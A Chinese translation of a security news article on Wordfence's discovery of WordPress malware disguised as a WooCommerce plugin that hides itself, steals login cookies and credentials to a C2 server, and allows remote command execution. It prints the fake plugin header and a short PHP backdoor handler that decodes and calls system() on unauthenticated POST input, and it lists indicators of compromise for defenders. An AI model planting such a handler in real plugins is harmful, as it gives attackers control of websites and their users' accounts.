新型 WordPress 恶意软件伪装成具有数据渗入和 RCE 功能的合法插件

阅读量45442

发布时间 : 2025-06-04 15:25:46

x
译文声明

本文是翻译文章,文章原作者 Ddos,文章来源:securityonline

原文地址:https://securityonline.info/new-wordpress-malware-masquerades-as-legit-plugin-with-data-exfiltration-and-rce-capabilities/

译文仅供参考,具体内容表达以及含义原文为准。

WordPress Malware, Hidden Plugin

Wordfence Threat Intelligence团队发现了一个欺骗性且高度持久的WordPress恶意软件变体,该变体将自己伪装成合法的插件 – 包括评论标题,管理UI和多层混淆。尽管外观,这种恶意软件默默地窃取敏感数据,包括登录cookie和管理员凭据,并实现远程代码执行。

“这个恶意软件包含的代码,确保它仍然隐藏在管理员仪表板中。它具有密码提取功能……基于AJAX的远程代码执行机制和未完成的代码表明它仍在开发中,“Wordfence解释道。该恶意软件于2025年4月24日在网站清理期间首次发现。

恶意软件位于/wp-contents/plugins/下自己的目录中,并包含似乎是合法的插件头,甚至模仿WooCommerce产品插件等已知插件:

<?php
/*
 * Plugin Name: WooCommerce Product Add-ons
 * Plugin URI: https://woocommerce.com/products/product-add-ons/
 * Description: Extend your WooCommerce products with custom fields, checkboxes, dropdowns, and more. Perfect for personalized products.
 * Author: WooCommerce
 * Author URI: https://woocommerce.com/
 * Version: 6.4.0
 * Text Domain: woocommerce-product-addons
 * License: GPLv2 or later
 * Requires PHP: 7.0
 * Requires at least: 5.6
 * WC requires at least: 6.0
 * WC tested up to: 8.0
 */

“我们想强调,这并不意味着WooCommerce插件与恶意软件有任何关系,”该团队指出。

为了避免检测,恶意软件使用all_plugins过滤器从WordPress管理界面中的插件页面隐藏自己。

恶意软件配备了一个泄漏机制,可以将敏感的用户数据传输到命令和控制(C2)服务器,其URL存储在WordPress wp_options表中。

使用 Cookie 和 AJAX 操作,恶意软件会收集:

    • WordPress用户名和电子邮件地址
    • 会话 Cookie

  • IP地址和用户代理
  • 登录凭据(通过 wp_login 和 authentication 钩子)

“cookie可用于劫持用户的会话并代表他们执行操作,”报告指出。数据通过base64编码和ROT13加密发送到攻击者的服务器,以模糊检测。

恶意软件还注册了一个nopriv AJAX操作,这意味着它可以在没有身份验证的情况下触发:

add_action('wp_ajax_nopriv_redacted', function() {
    if (isset($_POST['redacted'])) {
        $class = new ReflectionFunction(convert_uudecode("&<WES=&5M`")); $class->invoke($_POST['redacted']);
    }
});

这解码并调用 system() 函数,执行任意 shell 命令。第二个AJAX端点似乎不完整,这意味着恶意软件仍在开发中。

在同一站点清理期间发现的第二个插件使用了略有不同的隐藏技术,并添加了:

  • ①JavaScript 注入通过 wp_enqueue_scripts
  • ②畸形头部注射钩
  • ③用于包含服务器端缓存文件的 glob() 调用

“也许这个代码是由黑客在本地测试的,并以某种方式偷偷潜入这个插件。

Wordfence建议检查以下IoC:

 ①隐藏的插件文件 /wp-content/plugins/ 在 admin UI 中不可见

②重定向到外部支付网关

③数据库中存在 API_SN_CLOUDSERVER 选项

④显示 configure_cloudserver 参数的访问日志

⑤custom_reporter_timer cookie 的存在

本文翻译自securityonline 原文链接。如若转载请注明出处。
分享到:微信
+10赞
收藏
安全客
分享到:微信

发表评论

Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全KER All Rights Reserved 京ICP备08010314号-66